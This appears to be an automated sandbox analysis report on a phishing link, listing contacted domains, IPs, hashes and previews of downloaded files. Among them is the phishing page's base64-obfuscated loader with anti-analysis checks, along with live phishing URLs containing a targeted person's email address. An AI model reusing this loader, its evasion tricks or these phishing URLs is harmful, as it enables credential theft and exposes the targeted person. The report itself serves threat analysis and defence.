                      https://u40362724.ct.sendgrid.net/ls/click?upn=u001.AIAIIgsR9DYpfnDcYDDcB-2FH04-2Bw15hWv-2FQG9f9GyYMxoYZI0EMTcIFGlnLUMJaeXWfQkso8L0Pg22-2BN8Dl4SKkuGQK4LTBd6SrqGD16fuglHjKig9IdCQX6kMIoCbc3imWzJ6J5j-2FI5R1ZDT-2B3iVLs5XrdQdThvrNWcCC8-2BXszs-3DKCL7_KLIoTjFO40Z9pcySq7dJvP-2F4O0bxgkCEKrPbe9NcB9Lnt29GChfkzS40U4uEPnofQsSlowwfYWZWBouhSAGJhhutvfyEjm-2BohUBd9188ex3rH7ZinpIlHQnKRLKcL-2BuAMKPlmABiKh2Tl-2BWQVbtTYLLXzrZM1krN4q6Oas8IZF3K-2FKbiIWoKNYJ7gqMqxovcHmf5LD0qaDj1zFO-2BleUBdSw3rWLCtQW4Pj3WQVw-2Bx60-3Dfalse
                        unknown
                        https://code.jquery.com/jquery-3.6.0.min.jsfalse
                          high
                          https://gnfsjz.syfn-f.ru/gando!durwqnfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://nr3hz5fbqd.bazefrost.ru/liceYCYL/true
                          • Avira URL Cloud: phishing
                          unknown
                          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                            high
                            https://nr3hz5fbqd.bazefrost.ru/liceYCYL/#frobin.kaufman%40atlanticaviation.comfalse
                              unknown
                              https://nr3hz5fbqd.bazefrost.ru/liceYCYL/#workoutsfalse
                                unknown
                                https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                  high
                                  https://3484378239874382399-f4g8bka8hcb2hwfu.z02.azurefd.net/7329508157/hDzYdBaPJp/robin.kaufman@atlanticaviation.comfalse
                                  • Avira URL Cloud: phishing
                                  unknown
                                  https://developers.cloudflare.com/favicon.pngfalse
                                    high
                                    https://nr3hz5fbqd.bazefrost.ru/liceYCYL/#membershipfalse
                                      unknown
                                      https://challenges.cloudflare.com/turnstile/v0/b/324d0dcf743c/api.jsfalse
                                        high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        104.17.24.14
                                        unknownUnited States
                                        13335CLOUDFLARENETUSfalse
                                        167.89.118.118
                                        u40362724.ct.sendgrid.netUnited States
                                        11377SENDGRIDUSfalse
                                        104.18.94.41
                                        unknownUnited States
                                        13335CLOUDFLARENETUSfalse
                                        104.18.95.41
                                        challenges.cloudflare.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        239.255.255.250
                                        unknownReserved
                                        unknownunknownfalse
                                        188.114.97.3
                                        gnfsjz.syfn-f.ruEuropean Union
                                        13335CLOUDFLARENETUSfalse
                                        188.114.96.3
                                        unknownEuropean Union
                                        13335CLOUDFLARENETUSfalse
                                        151.101.66.137
                                        code.jquery.comUnited States
                                        54113FASTLYUSfalse
                                        172.67.165.90
                                        nr3hz5fbqd.bazefrost.ruUnited States
                                        13335CLOUDFLARENETUStrue
                                        151.101.194.137
                                        unknownUnited States
                                        54113FASTLYUSfalse
                                        172.217.16.196
                                        www.google.comUnited States
                                        15169GOOGLEUSfalse
                                        104.17.25.14
                                        cdnjs.cloudflare.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        104.16.2.189
                                        developers.cloudflare.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        IP
                                        192.168.2.4
                                        Joe Sandbox version:42.0.0 Malachite
                                        Analysis ID:1615977
                                        Start date and time:2025-02-15 20:33:41 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 3m 3s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:browseurl.jbs
                                        Sample URL:https://u40362724.ct.sendgrid.net/ls/click?upn=u001.AIAIIgsR9DYpfnDcYDDcB-2FH04-2Bw15hWv-2FQG9f9GyYMxoYZI0EMTcIFGlnLUMJaeXWfQkso8L0Pg22-2BN8Dl4SKkuGQK4LTBd6SrqGD16fuglHjKig9IdCQX6kMIoCbc3imWzJ6J5j-2FI5R1ZDT-2B3iVLs5XrdQdThvrNWcCC8-2BXszs-3DKCL7_KLIoTjFO40Z9pcySq7dJvP-2F4O0bxgkCEKrPbe9NcB9Lnt29GChfkzS40U4uEPnofQsSlowwfYWZWBouhSAGJhhutvfyEjm-2BohUBd9188ex3rH7ZinpIlHQnKRLKcL-2BuAMKPlmABiKh2Tl-2BWQVbtTYLLXzrZM1krN4q6Oas8IZF3K-2FKbiIWoKNYJ7gqMqxovcHmf5LD0qaDj1zFO-2BleUBdSw3rWLCtQW4Pj3WQVw-2Bx60-3D
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:8
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal52.win@18/23@28/14
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 172.217.16.131, 142.250.185.206, 142.250.110.84, 142.250.186.46, 142.250.185.110, 142.250.184.206, 199.232.210.172, 2.23.77.188, 172.217.18.14, 142.250.186.174, 142.250.181.234, 142.250.186.131, 142.250.186.78, 142.250.186.142, 172.217.23.110, 2.19.106.160, 20.12.23.50, 13.107.246.45
                                        • Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: https://u40362724.ct.sendgrid.net/ls/click?upn=u001.AIAIIgsR9DYpfnDcYDDcB-2FH04-2Bw15hWv-2FQG9f9GyYMxoYZI0EMTcIFGlnLUMJaeXWfQkso8L0Pg22-2BN8Dl4SKkuGQK4LTBd6SrqGD16fuglHjKig9IdCQX6kMIoCbc3imWzJ6J5j-2FI5R1ZDT-2B3iVLs5XrdQdThvrNWcCC8-2BXszs-3DKCL7_KLIoTjFO40Z9pcySq7dJvP-2F4O0bxgkCEKrPbe9NcB9Lnt29GChfkzS40U4uEPnofQsSlowwfYWZWBouhSAGJhhutvfyEjm-2BohUBd9188ex3rH7ZinpIlHQnKRLKcL-2BuAMKPlmABiKh2Tl-2BWQVbtTYLLXzrZM1krN4q6Oas8IZF3K-2FKbiIWoKNYJ7gqMqxovcHmf5LD0qaDj1zFO-2BleUBdSw3rWLCtQW4Pj3WQVw-2Bx60-3D
                                        No simulations
                                        No context
                                        No context
                                        No context
                                        No context
                                        No context
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                        Category:dropped
                                        Size (bytes):48316
                                        Entropy (8bit):5.6346993394709
                                        Encrypted:false
                                        SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                        MD5:2CA03AD87885AB983541092B87ADB299
                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                        Malicious:false
                                        Reputation:low
                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (48138)
                                        Category:downloaded
                                        Size (bytes):48139
                                        Entropy (8bit):5.399746609631708
                                        Encrypted:false
                                        SSDEEP:768:nCbU/CNu5h5taq75KvO0fV9/KFeWlzQylfTDjVsgVX2bwDBslY1L8ep7K1oiSJvU:4Nu5h5taq7gGYV9yjcylh2bQs3
                                        MD5:59306E15EB43DE76A56231E5E426EC80
                                        SHA1:7606B8E4AEACE12B393AD6DCEBDF6D64BC7240E9
                                        SHA-256:69865FE9BE4F6CDCED3CA8C047A486DB063F1179846F5EDFF395C39A7494FA34
                                        SHA-512:99C5EE7567FECB0FD92C4622EE949975972FC46E165AA8E9FF719B3A64472F15E6A79EC83CA533C7305B70B35984B7980AC0552CE1169DBD1DC2C3C1F2D83F4B
                                        Malicious:false
                                        Reputation:low
                                        URL:https://challenges.cloudflare.com/turnstile/v0/b/324d0dcf743c/api.js
                                        Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,g){try{var h=e[l](g),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function jt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function g(s){Ht(l,o,c,g,h,"next",s)}function h(s){Ht(l,o,c,g,h,"throw",s)}g(void 0)})}}function D(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):D(e,t)}function Ue(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function De(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Ue(e,c,a[c])})}return e}function Sr(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (65447)
                                        Category:dropped
                                        Size (bytes):89501
                                        Entropy (8bit):5.289893677458563
                                        Encrypted:false
                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                        Malicious:false
                                        Reputation:low
                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Web Open Font Format (Version 2), TrueType, length 21444, version 1.0
                                        Category:downloaded
                                        Size (bytes):21444
                                        Entropy (8bit):7.990871977021031
                                        Encrypted:true
                                        SSDEEP:384:8cEHB0MPPblbQ3jOYVdSj2WvnrFnimhmA4sC1ad7RNwAwEMwdz12N/:LEv5QKYanrFtm8d7Rbwyo/
                                        MD5:FFD3D57638A7899D80BCC108713C271C
                                        SHA1:D186409EE24FC3D1CC8194434DD707181EAD20EC
                                        SHA-256:99027D866818F716D208569108A962AC72200197CAE503EFE5B6BF002BF4915B
                                        SHA-512:7305C344CD8F954929314F3B5C9B996638E57D5F142A327DDC9F42F592880EA30B5102C73EE0E296BB3C4FC21D9FCE5D862A492B4BC1127BA2C79C4DEF527C62
                                        Malicious:false
                                        Reputation:low
                                        URL:https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlWHYg.woff2
                                        Preview:wOF2......S........P..ST..........................q..f..b?HVAR...`?STATX'..../D....(.N..d.0...6.$..D. ...........%..............B....6.@3....IND&..H...=.10.]....>.A,a.a8,\.K.0..+.....V..n...\.E...C._(T8..-1..n]....g;1.D.r.0.$3.adra)..<.r.#..YX.;....C(.....#a1.g.8Q......v.|.d'O......tF..@;.KKig1...?.rSM#...)..!@.-"`dcd#R..1.!T;...u.|.....K...NY.........q..YW...Q..`<..h...........^...'...4..~(..J\.z.....}?.f.C.....~ hB.TB.}.{.Vm..8....m/C..L.......`PH..M1....5m........R.nH.$GYX `.&...9.WY...%&~..]..$X!..-..E&U.B.....Z'n......K...,.......h/.].4m^o8.P.....-.k.....l.z. .(.%K.P....0.].Y].9M@Y.na.Yt...wJ.+.oy$J.......=%'|..$IT.%H.Bt......|H#...j..G...@p...B..../u...d............Y.......C..G..M.....6....X..VT..'W.2.6[.R...Z{._L1;.!~.......xZ\.*.-.L._....JG;W.*.L........8-.i.....|.%E..PX...*...CH....A.%y....9..E..ukWv.+]........t.3..d|..m>...L..e7.fUU.+kd.....W;.o`.x..!.1{*Ld...U.../D..T..u.B6Y..H..r.U...3s.....&.F.my@......T.~...y...4D<..5.o.f/..
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, ASCII text, with very long lines (65265)
                                        Category:downloaded
                                        Size (bytes):380643
                                        Entropy (8bit):3.590998722958422
                                        Encrypted:false
                                        SSDEEP:1536:PdOt1R/DvuCmrOjDD8Y/9p4Msz6mXdOt1R/DvuCmrOjDD8Y/9p4Msz6mpLBFnLB/:FmDvuCvr/4MszXmDvuCvr/4MszhH/
                                        MD5:9916FC8914EBDC8DDA03A44249BD03B6
                                        SHA1:54A6C719C458377C90B559963FCA9125ACD62FE7
                                        SHA-256:A1E541A61D7C8D881D503F5CCC6FB6E59C0C08C8D6219A44828015D8ABB82314
                                        SHA-512:A8EEF3B82799B63434CC1F1109D6F32A077D8C92855DE28C0FACD07141B1899950DA9797E0C61FAE55356C1289B70B7677CFFDA994DC1FA7C858D44D9361CA52
                                        Malicious:false
                                        Reputation:low
                                        URL:https://nr3hz5fbqd.bazefrost.ru/liceYCYL/
                                        Preview: Don&#039;t watch the clock; do what it does. Keep going. -->.<script>./* The only way to do great work is to love what you do. */.eBNYfaiyfk = atob("aHR0cHM6Ly9Ya3E2LmJhemVmcm9zdC5ydS9saWNlWUNZTC8=");.dvusjqOnvY = atob("bm9tYXRjaA==");.if(eBNYfaiyfk == dvusjqOnvY){.document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iaHR0cHM6Ly9kZXZlbG9wZXJzLmNsb3VkZmxhcmUuY29tL2Zhdmljb24ucG5nIiB0eXBlPSJpbWFnZS94LWljb24iPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPgogICAgPHNjcmlwdD4KICAgIGlmIChuYXZpZ2F0b3Iud2ViZHJpdmVyIHx8IHdpbmRvdy5jYWxsUGhhbnRvbSB8fCB3aW5kb3cuX3BoYW50b20gfHwgbmF2aWdhdG9yLnVzZXJBZ2VudC5pbmNsdWRlcygiQnVycCIpKSB7CiAgICAgICAgd2luZG93LmxvY2F0aW9uID0gImFib3V0OmJsYW5rIj
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                        Category:downloaded
                                        Size (bytes):937
                                        Entropy (8bit):7.737931820487441
                                        Encrypted:false
                                        SSDEEP:24:2PUSIn/IylOgX9qCigRmHQxlCNebarFY9:2PLCHlOgXQ9Oie+rw
                                        MD5:FC3B7BBE7970F47579127561139060E2
                                        SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                        SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                        SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                        Malicious:false
                                        Reputation:low
                                        URL:https://developers.cloudflare.com/favicon.png
                                        Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (65447)
                                        Category:downloaded
                                        Size (bytes):89501
                                        Entropy (8bit):5.289893677458563
                                        Encrypted:false
                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                        Malicious:false
                                        Reputation:low
                                        URL:https://code.jquery.com/jquery-3.6.0.min.js
                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):3992
                                        Entropy (8bit):5.591011855888861
                                        Encrypted:false
                                        SSDEEP:96:wOEaCgOEa3FZOfOEaiOEaEJc+ujOEaUNzOpaCgOpa3FZOfOpaiOpaEJc+ujOpaUu:/Cvmo1AVSCSmBMAsX
                                        MD5:2090BEB037F32795B478A4EFC49169FD
                                        SHA1:B9855F15009536715C099A558F22B1CE904BF6A7
                                        SHA-256:D6007057C57B5631CBF65083E601AA576397B0487F11C9DA06F80D1F9A3F7F01
                                        SHA-512:438DB9686A150E28DF1D75594D1A8646641CB5E03E7E4A456AF0014A1A7BC064597D17999BF4C91F7BF0A1618339D91390B73237FDA2EB539333D0FD5E3B835F
                                        Malicious:false
                                        Reputation:low
                                        URL:https://fonts.googleapis.com/css2?family=Oswald:wght@400;700&display=swap
                                        Preview:/* cyrillic-ext */.@font-face {. font-family: 'Oswald';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlbHYjedg.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Oswald';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlSHYjedg.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* vietnamese */.@font-face {. font-family: 'Oswald';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/oswald/v53/TK3IWkUHHAIjg75cFRf3bXL8LICs1_Fv40pKlN4NNSeSASz7FmlZHYjedg.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Reputation:low
                                        Preview:1
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                        Category:downloaded
                                        Size (bytes):48316
                                        Entropy (8bit):5.6346993394709
                                        Encrypted:false
                                        SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                        MD5:2CA03AD87885AB983541092B87ADB299
                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                        Malicious:false
                                        Reputation:low
                                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):937
                                        Entropy (8bit):7.737931820487441
                                        Encrypted:false
                                        SSDEEP:24:2PUSIn/IylOgX9qCigRmHQxlCNebarFY9:2PLCHlOgXQ9Oie+rw
                                        MD5:FC3B7BBE7970F47579127561139060E2
                                        SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                        SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                        SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                        Malicious:false
                                        Reputation:low
                                        Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:very short file (no magic)
                                        Category:downloaded
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Reputation:low
                                        URL:https://gnfsjz.syfn-f.ru/gando!durwqn
                                        Preview:1
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (48138)
                                        Category:dropped
                                        Size (bytes):48139
